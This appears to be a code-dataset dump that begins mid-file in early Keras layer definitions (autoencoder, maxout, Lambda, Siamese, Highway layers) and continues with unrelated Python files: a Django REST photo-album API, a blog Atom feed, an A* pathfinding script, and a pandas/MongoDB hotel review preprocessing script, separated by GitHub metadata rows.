'b_regularizer': self.b_regularizer.get_config() if self.b_regularizer else None,
'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
'b_constraint': self.b_constraint.get_config() if self.b_constraint else None,
'input_dim': self.input_dim,
'input_length': self.input_length}
base_config = super(TimeDistributedDense, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class ActivityRegularization(Layer):
'''Layer that passes through its input unchanged, but applies an update
to the cost function based on the activity.
# Input shape
Arbitrary. Use the keyword argument `input_shape`
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
# Output shape
Same shape as input.
# Arguments
l1: L1 regularization factor.
l2: L2 regularization factor.
'''
def __init__(self, l1=0., l2=0., **kwargs):
super(ActivityRegularization, self).__init__(**kwargs)
self.l1 = l1
self.l2 = l2
activity_regularizer = ActivityRegularizer(l1=l1, l2=l2)
activity_regularizer.set_layer(self)
self.regularizers = [activity_regularizer]
def get_output(self, train=False):
return self.get_input(train)
def get_config(self):
config = {'name': self.__class__.__name__,
'l1': self.l1,
'l2': self.l2}
base_config = super(ActivityRegularization, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class AutoEncoder(Layer):
'''A customizable autoencoder model.
# Input shape
Same as encoder input.
# Output shape
If `output_reconstruction = True` then dim(input) = dim(output)
else dim(output) = dim(hidden).
# Arguments
encoder: A [layer](./) or [layer container](./containers.md).
decoder: A [layer](./) or [layer container](./containers.md).
output_reconstruction: If this is `False`,
the output of the autoencoder is the output of
the deepest hidden layer.
Otherwise, the output of the final decoder layer is returned.
weights: list of numpy arrays to set as initial weights.
# Examples
```python
from keras.layers import containers, AutoEncoder, Dense
from keras import models
# input shape: (nb_samples, 32)
encoder = containers.Sequential([Dense(16, input_dim=32), Dense(8)])
decoder = containers.Sequential([Dense(16, input_dim=8), Dense(32)])
autoencoder = AutoEncoder(encoder=encoder, decoder=decoder, output_reconstruction=True)
model = models.Sequential()
model.add(autoencoder)
# training the autoencoder:
model.compile(optimizer='sgd', loss='mse')
model.fit(X_train, X_train, nb_epoch=10)
# predicting compressed representations of inputs:
autoencoder.output_reconstruction = False # the model has to be recompiled after modifying this property
model.compile(optimizer='sgd', loss='mse')
representations = model.predict(X_test)
# the model is still trainable, although it now expects compressed representations as targets:
model.fit(X_test, representations, nb_epoch=1) # in this case the loss will be 0, so it's useless
# to keep training against the original inputs, just switch back output_reconstruction to True:
autoencoder.output_reconstruction = True
model.compile(optimizer='sgd', loss='mse')
model.fit(X_train, X_train, nb_epoch=10)
```
'''
def __init__(self, encoder, decoder, output_reconstruction=True,
weights=None, **kwargs):
super(AutoEncoder, self).__init__(**kwargs)
self._output_reconstruction = output_reconstruction
self.encoder = encoder
self.decoder = decoder
if output_reconstruction:
self.decoder.set_previous(self.encoder)
if weights is not None:
self.set_weights(weights)
super(AutoEncoder, self).__init__(**kwargs)
self.build()
@property
def output_reconstruction(self):
return self._output_reconstruction
@output_reconstruction.setter
def output_reconstruction(self, value):
self._output_reconstruction = value
self.build()
def build(self):
self.trainable_weights = []
self.regularizers = []
self.constraints = []
self.updates = []
if self.output_reconstruction:
layers = [self.encoder, self.decoder]
else:
layers = [self.encoder]
for layer in layers:
params, regularizers, constraints, updates = layer.get_params()
self.regularizers += regularizers
self.updates += updates
for p, c in zip(params, constraints):
if p not in self.trainable_weights:
self.trainable_weights.append(p)
self.constraints.append(c)
def set_previous(self, node, reset_weights=True):
self.encoder.set_previous(node, reset_weights)
if reset_weights:
self.build()
def get_weights(self):
weights = []
for layer in [self.encoder, self.decoder]:
weights += layer.get_weights()
return weights
def set_weights(self, weights):
nb_param = len(self.encoder.trainable_weights)
self.encoder.set_weights(weights[:nb_param])
self.decoder.set_weights(weights[nb_param:])
def get_input(self, train=False):
return self.encoder.get_input(train)
@property
def input(self):
return self.encoder.input
@property
def input_shape(self):
return self.encoder.input_shape
@property
def output_shape(self):
if self.output_reconstruction:
return self.decoder.output_shape
else:
return self.encoder.output_shape
def get_output(self, train=False):
if self.output_reconstruction:
return self.decoder.get_output(train)
else:
return self.encoder.get_output(train)
def get_config(self):
return {'name': self.__class__.__name__,
'encoder_config': self.encoder.get_config(),
'decoder_config': self.decoder.get_config(),
'output_reconstruction': self.output_reconstruction}
class MaxoutDense(Layer):
'''A dense maxout layer.
A `MaxoutDense` layer takes the element-wise maximum of
`nb_feature` `Dense(input_dim, output_dim)` linear layers.
This allows the layer to learn a convex,
piecewise linear activation function over the inputs.
Note that this is a *linear* layer;
if you wish to apply activation function
(you shouldn't need to --they are universal function approximators),
an `Activation` layer must be added after.
# Input shape
2D tensor with shape: `(nb_samples, input_dim)`.
# Output shape
2D tensor with shape: `(nb_samples, output_dim)`.
# References
- [Maxout Networks](http://arxiv.org/pdf/1302.4389.pdf)
'''
input_ndim = 2
def __init__(self, output_dim, nb_feature=4,
init='glorot_uniform', weights=None,
W_regularizer=None, b_regularizer=None, activity_regularizer=None,
W_constraint=None, b_constraint=None, input_dim=None, **kwargs):
self.output_dim = output_dim
self.nb_feature = nb_feature
self.init = initializations.get(init)
self.W_regularizer = regularizers.get(W_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.b_constraint = constraints.get(b_constraint)
self.constraints = [self.W_constraint, self.b_constraint]
self.initial_weights = weights
self.input_dim = input_dim
if self.input_dim:
kwargs['input_shape'] = (self.input_dim,)
self.input = K.placeholder(ndim=2)
super(MaxoutDense, self).__init__(**kwargs)
def build(self):
input_dim = self.input_shape[1]
self.W = self.init((self.nb_feature, input_dim, self.output_dim))
self.b = K.zeros((self.nb_feature, self.output_dim))
self.trainable_weights = [self.W, self.b]
self.regularizers = []
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
if self.initial_weights is not None:
self.set_weights(self.initial_weights)
del self.initial_weights
@property
def output_shape(self):
return (self.input_shape[0], self.output_dim)
def get_output(self, train=False):
X = self.get_input(train)
# -- don't need activation since it's just linear.
output = K.max(K.dot(X, self.W) + self.b, axis=1)
return output
def get_config(self):
config = {'name': self.__class__.__name__,
'output_dim': self.output_dim,
'init': self.init.__name__,
'nb_feature': self.nb_feature,
'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
'b_regularizer': self.b_regularizer.get_config() if self.b_regularizer else None,
'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
'b_constraint': self.b_constraint.get_config() if self.b_constraint else None,
'input_dim': self.input_dim}
base_config = super(MaxoutDense, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Lambda(Layer):
'''Used for evaluating an arbitrary Theano / TensorFlow expression
on the output of the previous layer.
# Input shape
Arbitrary. Use the keyword argument input_shape
(tuple of integers, does not include the samples axis)
when using this layer as the first layer in a model.
# Output shape
Specified by `output_shape` argument.
# Arguments
function: The function to be evaluated.
Takes one argument: the output of previous layer
output_shape: Expected output shape from function.
Could be a tuple or a function of the shape of the input
'''
def __init__(self, function, output_shape=None, **kwargs):
super(Lambda, self).__init__(**kwargs)
py3 = sys.version_info[0] == 3
if py3:
self.function = marshal.dumps(function.__code__)
else:
assert hasattr(function, 'func_code'), ('The Lambda layer "function"'
' argument must be a Python function.')
self.function = marshal.dumps(function.func_code)
if output_shape is None:
self._output_shape = None
elif type(output_shape) in {tuple, list}:
self._output_shape = tuple(output_shape)
else:
if py3:
self._output_shape = marshal.dumps(output_shape.__code__)
else:
self._output_shape = marshal.dumps(output_shape.func_code)
super(Lambda, self).__init__()
@property
def output_shape(self):
if self._output_shape is None:
return self.input_shape
elif type(self._output_shape) == tuple:
return (self.input_shape[0], ) + self._output_shape
else:
output_shape_func = marshal.loads(self._output_shape)
output_shape_func = types.FunctionType(output_shape_func, globals())
shape = output_shape_func(self.input_shape)
if type(shape) not in {list, tuple}:
raise Exception('output_shape function must return a tuple')
return tuple(shape)
def get_output(self, train=False):
X = self.get_input(train)
func = marshal.loads(self.function)
func = types.FunctionType(func, globals())
return func(X)
class MaskedLambda(MaskedLayer, Lambda):
pass
class LambdaMerge(Lambda):
'''LambdaMerge layer for evaluating an arbitrary Theano / TensorFlow
function over multiple inputs.
# Output shape
Specified by output_shape argument
# Arguments
layers - Input layers. Similar to layers argument of Merge
function - The function to be evaluated. Takes one argument:
list of outputs from input layers
output_shape - Expected output shape from function.
Could be a tuple or a function of list of input shapes
'''
def __init__(self, layers, function, output_shape=None):
if len(layers) < 2:
raise Exception('Please specify two or more input layers '
'(or containers) to merge.')
self.layers = layers
self.trainable_weights = []
self.regularizers = []
self.constraints = []
self.updates = []
for l in self.layers:
params, regs, consts, updates = l.get_params()
self.regularizers += regs
self.updates += updates
# params and constraints have the same size
for p, c in zip(params, consts):
if p not in self.trainable_weights:
self.trainable_weights.append(p)
self.constraints.append(c)
py3 = sys.version_info[0] == 3
if py3:
self.function = marshal.dumps(function.__code__)
else:
self.function = marshal.dumps(function.func_code)
if output_shape is None:
self._output_shape = None
elif type(output_shape) in {tuple, list}:
self._output_shape = tuple(output_shape)
else:
if py3:
self._output_shape = marshal.dumps(output_shape.__code__)
else:
self._output_shape = marshal.dumps(output_shape.func_code)
super(Lambda, self).__init__()
@property
def output_shape(self):
input_shapes = [layer.output_shape for layer in self.layers]
if self._output_shape is None:
return input_shapes[0]
elif type(self._output_shape) == tuple:
return (input_shapes[0][0], ) + self._output_shape
else:
output_shape_func = marshal.loads(self._output_shape)
output_shape_func = types.FunctionType(output_shape_func, globals())
shape = output_shape_func(input_shapes)
if type(shape) not in {list, tuple}:
raise Exception('output_shape function must return a tuple.')
return tuple(shape)
def get_params(self):
return self.trainable_weights, self.regularizers, self.constraints, self.updates
def get_output(self, train=False):
func = marshal.loads(self.function)
func = types.FunctionType(func, globals())
inputs = [layer.get_output(train) for layer in self.layers]
return func(inputs)
def get_input(self, train=False):
res = []
for i in range(len(self.layers)):
o = self.layers[i].get_input(train)
if not type(o) == list:
o = [o]
for output in o:
if output not in res:
res.append(output)
return res
@property
def input(self):
return self.get_input()
def supports_masked_input(self):
return False
def get_output_mask(self, train=None):
return None
def get_weights(self):
weights = []
for l in self.layers:
weights += l.get_weights()
return weights
def set_weights(self, weights):
for i in range(len(self.layers)):
nb_param = len(self.layers[i].trainable_weights) + len(self.non_trainable_weights)
self.layers[i].set_weights(weights[:nb_param])
weights = weights[nb_param:]
def get_config(self):
config = {'name': self.__class__.__name__,
'layers': [l.get_config() for l in self.layers],
'function': self.function,
'output_shape': self._output_shape}
base_config = super(LambdaMerge, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Siamese(Layer):
'''Share a layer accross multiple inputs.
For instance, this allows you to applied e.g.
a same `Dense` layer to the output of two
different layers in a graph.
# Output shape
Depends on merge_mode argument
# Arguments
layer: The layer to be shared across multiple inputs
inputs: Inputs to the shared layer
merge_mode: Same meaning as `mode` argument of Merge layer
concat_axis: Same meaning as `concat_axis` argument of Merge layer
dot_axes: Same meaning as `dot_axes` argument of Merge layer
is_graph: Should be set to True when used inside `Graph`
'''
def __init__(self, layer, inputs, merge_mode='concat',
concat_axis=1, dot_axes=-1, is_graph=False):
if merge_mode not in ['sum', 'mul', 'concat', 'ave',
'join', 'cos', 'dot', None]:
raise Exception('Invalid merge mode: ' + str(merge_mode))
if merge_mode in {'cos', 'dot'}:
if len(inputs) > 2:
raise Exception(merge_mode + ' merge takes exactly 2 layers.')
self.layer = layer
self.trainable = layer.trainable
self.is_graph = is_graph
self.inputs = inputs
self.layer.set_previous(inputs[0])
self.merge_mode = merge_mode
self.concat_axis = concat_axis
self.dot_axes = dot_axes
self.trainable_weights = []
self.regularizers = []
self.constraints = []
self.updates = []
layers = [layer]
if merge_mode and not is_graph:
layers += inputs
for l in layers:
params, regs, consts, updates = l.get_params()
self.regularizers += regs
self.updates += updates
# params and constraints have the same size
for p, c in zip(params, consts):
if p not in self.trainable_weights:
self.trainable_weights.append(p)
self.constraints.append(c)
super(Siamese, self).__init__()
@property
def output_shape(self):
if self.merge_mode is None:
return self.layer.output_shape
input_shapes = [self.get_output_shape(i) for i in range(len(self.inputs))]
if self.merge_mode in ['sum', 'mul', 'ave']:
return input_shapes[0]
elif self.merge_mode == 'concat':
output_shape = list(input_shapes[0])
for shape in input_shapes[1:]:
output_shape[self.concat_axis] += shape[self.concat_axis]
return tuple(output_shape)
elif self.merge_mode == 'join':
return None
elif self.merge_mode == 'dot':
shape1 = list(input_shapes[0])
shape2 = list(input_shapes[1])
for i in self.dot_axes[0]:
shape1.pop(i)
for i in self.dot_axes[1]:
shape2.pop(i)
shape = shape1 + shape2[1:]
if len(shape) == 1:
shape.append(1)
return tuple(shape)
elif self.merge_mode == 'cos':
return (input_shapes[0][0], 1)
def get_params(self):
return self.trainable_weights, self.regularizers, self.constraints, self.updates
def set_layer_input(self, head):
self.layer.set_previous(self.inputs[head], reset_weights=False)
def get_output_at(self, head, train=False):
X = self.inputs[head].get_output(train)
mask = self.inputs[head].get_output_mask(train)
Y = self.layer(X, mask)
return Y
def get_output_shape(self, head, train=False):
self.set_layer_input(head)
return self.layer.output_shape
def get_output_join(self, train=False):
o = OrderedDict()
for i in range(len(self.inputs)):
X = self.get_output_at(i, train)
name = getattr(self.inputs[i], 'name', None)
if name is None:
raise ValueError('merge_mode="join" '
'only works with named inputs.')
o[name] = X
return o
def get_output_sum(self, train=False):
s = self.get_output_at(0, train)
for i in range(1, len(self.inputs)):
s += self.get_output_at(i, train)
return s
def get_output_ave(self, train=False):
n = len(self.inputs)
s = self.get_output_at(0, train)
for i in range(1, n):
s += self.get_output_at(i, train)
s /= n
return s
def get_output_concat(self, train=False):
inputs = [self.get_output_at(i, train) for i in range(len(self.inputs))]
return K.concatenate(inputs, axis=self.concat_axis)
def get_output_mul(self, train=False):
s = self.get_output_at(0, train)
for i in range(1, len(self.inputs)):
s *= self.get_output_at(i, train)
return s
def get_output_dot(self, train=False):
if K._BACKEND != 'theano':
raise Exception('"dot" merge mode will only work with Theano.')
from theano import tensor as T
l1 = self.get_output_at(0, train)
l2 = self.get_output_at(1, train)
output = T.batched_tensordot(l1, l2, self.dot_axes)
output = output.dimshuffle((0, 'x'))
return output
def get_output_cos(self, train=False):
if K._BACKEND != 'theano':
raise Exception('"cos" merge mode will only work with Theano.')
import theano
from theano import tensor as T
l1 = self.get_output_at(0, train)
l2 = self.get_output_at(1, train)
output = T.batched_tensordot(l1, l2, self.dot_axes) / T.sqrt(T.batched_tensordot(l1, l1, self.dot_axes) * T.batched_tensordot(l2, l2, self.dot_axes))
output = output.dimshuffle((0, 'x'))
return output
def get_output(self, train=False):
mode = self.merge_mode
if mode == 'join':
return self.get_output_join(train)
elif mode == 'concat':
return self.get_output_concat(train)
elif mode == 'sum':
return self.get_output_sum(train)
elif mode == 'ave':
return self.get_output_ave(train)
elif mode == 'mul':
return self.get_output_mul(train)
elif mode == 'dot':
return self.get_output_dot(train)
elif mode == 'cos':
return self.get_output_cos(train)
def get_input(self, train=False):
res = []
for i in range(len(self.inputs)):
o = self.inputs[i].get_input(train)
if type(o) != list:
o = [o]
for output in o:
if output not in res:
res.append(output)
return res
@property
def input(self):
return self.get_input()
def supports_masked_input(self):
return False
def get_output_mask(self, train=None):
return None
def get_weights(self):
weights = self.layer.get_weights()
if self.merge_mode and not self.is_graph:
for m in self.inputs:
weights += m.get_weights()
return weights
def set_weights(self, weights):
nb_param = len(self.layer.trainable_weights)
self.layer.set_weights(weights[:nb_param])
weights = weights[nb_param:]
if self.merge_mode and not self.is_graph:
for i in range(len(self.inputs)):
nb_param = len(self.inputs[i].trainable_weights)
self.inputs[i].set_weights(weights[:nb_param])
weights = weights[nb_param:]
def get_config(self):
config = {'name': self.__class__.__name__,
'layer': self.layer.get_config(),
'inputs': [m.get_config() for m in self.inputs],
'merge_mode': self.merge_mode,
'concat_axis': self.concat_axis,
'dot_axes': self.dot_axes,
'is_graph': self.is_graph}
base_config = super(Siamese, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class SiameseHead(Layer):
'''This layer should be added only on top of a Siamese layer
with merge_mode = None.
Outputs the output of the Siamese layer at a given index,
specified by the head argument.
# Arguments
head: The index at which the output of the Siamese layer
should be obtained
'''
def __init__(self, head):
self.head = head
self.trainable_weights = []
super(SiameseHead, self).__init__()
def get_output(self, train=False):
return self.get_input(train)
@property
def input_shape(self):
return self.previous.get_output_shape(self.head)
def get_input(self, train=False):
return self.previous.get_output_at(self.head, train)
def get_config(self):
config = {'name': self.__class__.__name__,
'head': self.head}
base_config = super(SiameseHead, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def add_shared_layer(layer, inputs):
'''Use this function to add a shared layer across
multiple Sequential models without merging the outputs.
'''
input_layers = [l.layers[-1] for l in inputs]
s = Siamese(layer, input_layers, merge_mode=None)
for i in range(len(inputs)):
sh = SiameseHead(i)
inputs[i].add(s)
inputs[i].add(sh)
class Highway(Layer):
'''Densely connected highway network,
a natural extension of LSTMs to feedforward networks.
# Input shape
2D tensor with shape: `(nb_samples, input_dim)`.
# Output shape
2D tensor with shape: `(nb_samples, input_dim)`.
# Arguments
init: name of initialization function for the weights of the layer
(see [initializations](../initializations.md)),
or alternatively, Theano function to use for weights
initialization. This parameter is only relevant
if you don't pass a `weights` argument.
transform_bias: value for the bias to take on initially (default -2)
activation: name of activation function to use
(see [activations](../activations.md)),
or alternatively, elementwise Theano function.
If you don't specify anything, no activation is applied
(ie. "linear" activation: a(x) = x).
weights: list of numpy arrays to set as initial weights.
The list should have 1 element, of shape `(input_dim, output_dim)`.
W_regularizer: instance of [WeightRegularizer](../regularizers.md)
(eg. L1 or L2 regularization), applied to the main weights matrix.
b_regularizer: instance of [WeightRegularizer](../regularizers.md),
applied to the bias.
activity_regularizer: instance of [ActivityRegularizer](../regularizers.md),
applied to the network output.
W_constraint: instance of the [constraints](../constraints.md) module
(eg. maxnorm, nonneg), applied to the main weights matrix.
b_constraint: instance of the [constraints](../constraints.md) module,
applied to the bias.
input_dim: dimensionality of the input (integer).
This argument (or alternatively, the keyword argument `input_shape`)
is required when using this layer as the first layer in a model.
# References
- [Highway Networks](http://arxiv.org/pdf/1505.00387v2.pdf)
'''
input_ndim = 2
def __init__(self, init='glorot_uniform', transform_bias=-2,
activation='linear', weights=None,
W_regularizer=None, b_regularizer=None, activity_regularizer=None,
W_constraint=None, b_constraint=None, input_dim=None, **kwargs):
self.init = initializations.get(init)
self.transform_bias = transform_bias
self.activation = activations.get(activation)
self.W_regularizer = regularizers.get(W_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.b_constraint = constraints.get(b_constraint)
self.constraints = [self.W_constraint, self.b_constraint]
self.initial_weights = weights
self.input_dim = input_dim
if self.input_dim:
kwargs['input_shape'] = (self.input_dim,)
self.input = K.placeholder(ndim=2)
super(Highway, self).__init__(**kwargs)
def build(self):
input_dim = self.input_shape[1]
self.W = self.init((input_dim, input_dim))
self.W_carry = self.init((input_dim, input_dim))
self.b = K.zeros((input_dim,))
# initialize with a vector of values `transform_bias`
self.b_carry = K.variable(np.ones((input_dim,)) * self.transform_bias)
self.trainable_weights = [self.W, self.b, self.W_carry, self.b_carry]
self.regularizers = []
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
if self.initial_weights is not None:
self.set_weights(self.initial_weights)
del self.initial_weights
@property
def output_shape(self):
return (self.input_shape[0], self.input_shape[1])
def get_output(self, train=False):
X = self.get_input(train)
transform_weight = activations.sigmoid(K.dot(X, self.W_carry) + self.b_carry)
act = self.activation(K.dot(X, self.W) + self.b)
act *= transform_weight
output = act + (1 - transform_weight) * X
return output
def get_config(self):
config = {'name': self.__class__.__name__,
'init': self.init.__name__,
'transform_bias': self.transform_bias,
'activation': self.activation.__name__,
'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
'b_regularizer': self.b_regularizer.get_config() if self.b_regularizer else None,
'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
'b_constraint': self.b_constraint.get_config() if self.b_constraint else None,
'input_dim': self.input_dim}
base_config = super(Highway, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
| [
"noreply@github.com"
] | DanlanChen.noreply@github.com |
be05cf2b10f7e7bfc6653ce3f061cc78f3aaf2df | 88ff2533b62da1ebfb5cd94cf9857a589f602b14 | /pics/views.py | ba10497b415f1ab0483aae48e394cc5fa590591e | [] | no_license | esdrasbrz/pics-api | 0fabbc2c973c7da8e5a1e2ab70d97d0dedbaef10 | e686fbc0787a670328299893c60f1996aed66464 | refs/heads/master | 2021-01-22T03:17:49.939839 | 2017-02-06T17:37:12 | 2017-02-06T17:37:12 | 81,111,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | from .models import Album, Foto
from .serializers import AlbumSerializer, FotoSerializer
from .permissions import IsOwnerOrReadOnly
from rest_framework.response import Response
from django.http import HttpResponse
from rest_framework.decorators import detail_route
from rest_framework import generics, permissions, renderers, viewsets, serializers
from django.contrib.auth.models import User
from wsgiref.util import FileWrapper
class AlbumViewSet(viewsets.ModelViewSet):
"""
This viewset automatically provides `list`, `create`, `retrieve`,
`update` and `destroy` actions.
"""
queryset = Album.objects.all()
serializer_class = AlbumSerializer
permission_classes = (permissions.IsAuthenticated, IsOwnerOrReadOnly)
def perform_create(self, serializer):
serializer.save(user=self.request.user)
class FotoViewSet(viewsets.ModelViewSet):
queryset = Foto.objects.all()
serializer_class = FotoSerializer
permission_classes = (permissions.IsAuthenticated, IsOwnerOrReadOnly)
def perform_create(self, serializer):
album = serializer.validated_data['album']
if self.request.user.id == album.user_id:
serializer.save(user=self.request.user)
else:
raise serializers.ValidationError('Usuario nao tem acesso ao album')
@detail_route(methods=['GET'])
def get_file(self, request, *args, **kwargs):
foto = self.get_object()
with open(foto.imagem.path, 'rb') as img:
response = HttpResponse(FileWrapper(img), content_type='image/jpeg')
return response
| [
"esdrasbrz@gmail.com"
] | esdrasbrz@gmail.com |
89fbdba1b70cdb22da26e68b9978fd3abcd9e436 | 6e3e1834eaad3a0c97bf645238e59a0599e047b4 | /blog/feeds.py | 720465e3999af4b68079e03f4bb4db306ed758e4 | [
"JSON"
] | permissive | davogler/davsite | 2dc42bfebb476d94f92520e8829999859deae80b | edd8ceed560690fa2c3eefde236416ffba559a2e | refs/heads/master | 2021-01-19T06:31:20.655909 | 2014-01-03T19:04:13 | 2014-01-03T19:04:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | from django.core.exceptions import ObjectDoesNotExist
from django.utils.feedgenerator import Atom1Feed
from django.contrib.sites.models import Site
from django.contrib.syndication.views import Feed
from blog.models import Category, Entry
current_site = Site.objects.get_current()
class LatestEntriesFeed(Feed):
author_name = "David Vogler"
copyright = "http://%s/about/" % current_site.domain
description = "Latest entries posted to %s" % current_site.name
feed_type = Atom1Feed
item_copyright = "http://%s/about/" % current_site.domain
item_author_name = "David Vogler"
item_author_link = "http://%s/" % current_site.domain
link = "/feeds/entries/"
title = "%s: Latest entries" % current_site.name
def items(self):
return Entry.live.all()[:15]
def item_pubdate(self, item):
return item.pub_date
def item_guid(self, item):
return "tag:%s,%s:%s" % (current_site.domain, item.pub_date.strftime('%Y-%m-%d'), item.get_absolute_url())
def item_categories(self, item):
return [c.title for c in item.categories.all()]
| [
"dave@sparkhouse.com"
] | dave@sparkhouse.com |
0ad9ed51c42d553820ba8498e80bc709508623a0 | c7189909983e498af6793c25cd96e50815d4a05f | /pathing.py | 75d037c3419c21d79a777d0cb9a4a92eac475a0d | [] | no_license | CapSnCrunch/social-insects | 0a2bdc422fa4491d1f6fc98338a529461e277235 | 7392f81438490d1be7e3379456adae720ed50bd4 | refs/heads/main | 2023-08-29T12:34:36.611393 | 2021-10-19T15:18:48 | 2021-10-19T15:18:48 | 381,561,645 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 4,180 | py | import numpy as np
# https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2
# https://medium.com/@alvarorubiogomez90/hello-nicholas-e611da90b4eb
class Node():
"""A node class for A* Pathfinding"""
def __init__(self, parent=None, position=None):
self.parent = parent
self.position = position
self.g = 0
self.h = 0
self.f = 0
def __eq__(self, other):
return self.position == other.position
def astar(maze, start, end):
"""Returns a list of tuples as a path from the given start to the given end in the given maze"""
# Create start and end node
start_node = Node(None, start)
start_node.g = start_node.h = start_node.f = 0
end_node = Node(None, end)
end_node.g = end_node.h = end_node.f = 0
# Initialize both open and closed list
open_list = []
closed_list = []
# Add the start node
open_list.append(start_node)
# Loop until you find the end
while len(open_list) > 0:
# Get the current node
current_node = open_list[0]
current_index = 0
for index, item in enumerate(open_list):
if item.f < current_node.f:
current_node = item
current_index = index
# Pop current off open list, add to closed list
open_list.pop(current_index)
closed_list.append(current_node)
# Found the goal
if current_node == end_node:
path = []
current = current_node
while current is not None:
path.append(current.position)
current = current.parent
return path[::-1] # Return reversed path
# Generate children
children = []
for new_position in [(0, -1), (0, 1), (-1, 0), (1, 0)]: # Adjacent squares
# Get node position
node_position = (current_node.position[0] + new_position[0], current_node.position[1] + new_position[1])
# Make sure within range
if node_position[0] > (len(maze) - 1) or node_position[0] < 0 or node_position[1] > (len(maze[len(maze)-1]) -1) or node_position[1] < 0:
continue
# Make sure walkable terrain
if maze[node_position[0]][node_position[1]] != 0:
continue
# Create new node
new_node = Node(current_node, node_position)
# Append
children.append(new_node)
# Loop through children
for child in children:
# Child is on the closed list
for closed_child in closed_list:
if child == closed_child:
break
else:
# Create the f, g, and h values
child.g = current_node.g + 1
# H: Manhattan distance to end point
child.h = abs(child.position[0] - end_node.position[0]) + abs(child.position[1] - end_node.position[1])
child.f = child.g + child.h
# Child is already in the open list
for open_node in open_list:
# check if the new path to children is worst or equal
# than one already in the open_list (by measuring g)
if child == open_node and child.g >= open_node.g:
break
else:
# Add the child to the open list
open_list.append(child)
if __name__ == '__main__':
maze = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]])
start = (0, 0)
end = (5, 2)
print('maze', maze)
path = astar(maze, start, end)[1:]
print(path)
print(len(path)) | [
"samuelperales4@gmail.com"
] | samuelperales4@gmail.com |
2bc13d9f7e37cc4b96a7a9017432d5033ac8bdd5 | 1ea32d678e5767b9621f2cbb35aa23235f169907 | /Python Files/1_read_in.py | 2f9ecb4c40f0cfd1e4e80450749c1a2c6d290450 | [] | no_license | papaulul/HotelReviews | f38f6ffe4b45698d212ae1b220351966659ab5b2 | 788d61fab32058799c6b3317b74fd931b604c875 | refs/heads/master | 2022-08-20T06:17:29.497193 | 2019-08-15T21:37:26 | 2019-08-15T21:37:26 | 163,245,280 | 0 | 0 | null | 2022-07-29T22:33:26 | 2018-12-27T03:59:19 | Jupyter Notebook | UTF-8 | Python | false | false | 3,462 | py | #%%
import os
import pandas as pd
import numpy as np
import pymongo
from pymongo import MongoClient
print ('Mongo version', pymongo.__version__)
client = MongoClient('localhost', 27017)
db = client.reviews
reviews = db.full
hotel = db.hotel
import re
import pickle
#%%
hotel = pd.DataFrame(list(hotel.find()), columns = ['_id', 'hotelname', 'hotel_rating', 'url', 'num_amenities', 'amenities', 'price_range', 'num_rooms'])
hotel.rename({'hotelname': 'hotel_name'}, axis=1 ,inplace = True)
#%%
reviews = pd.DataFrame(list(reviews.find()), columns = ['_id', 'review', 'hotel_name', 'travel_type', 'bubble', 'url'])
reviews.rename({'bubble': 'hotel_rating'}, axis=1 ,inplace = True)
#%%
df = [hotel, reviews]
for dframe in df:
dframe.drop('_id', axis=1, inplace = True)
dframe['hotel_name'] = dframe['hotel_name'].apply(lambda x: x[0])
#%%
# Hotel Preprocessing
def review_cleaning(text):
# Removes More in list
if "More" in text:
text.remove("More")
# if list was just More or empty, turns to NA
if len(text) == 0:
return np.NaN
# Else returns the whole review
else:
return " ".join(text).strip()
reviews['review']=reviews['review'].apply(review_cleaning)
hotel['hotel_rating_hotel']=hotel['hotel_rating'].apply(lambda x: float(str(x).split(" ")[0]) if x != None else np.NaN)
reviews['hotel_rating_review']=reviews['hotel_rating'].apply(lambda x: int(str(x).split("_")[-1][0]) if x != None else np.NaN)
hotel.drop('hotel_rating', axis = 1 , inplace = True)
reviews.drop('hotel_rating', axis = 1 , inplace = True)
#%%
hotel['low_price']=hotel['price_range'].apply(lambda x: int(x[0][1:]) if x[0] != "NAN" else np.NaN)
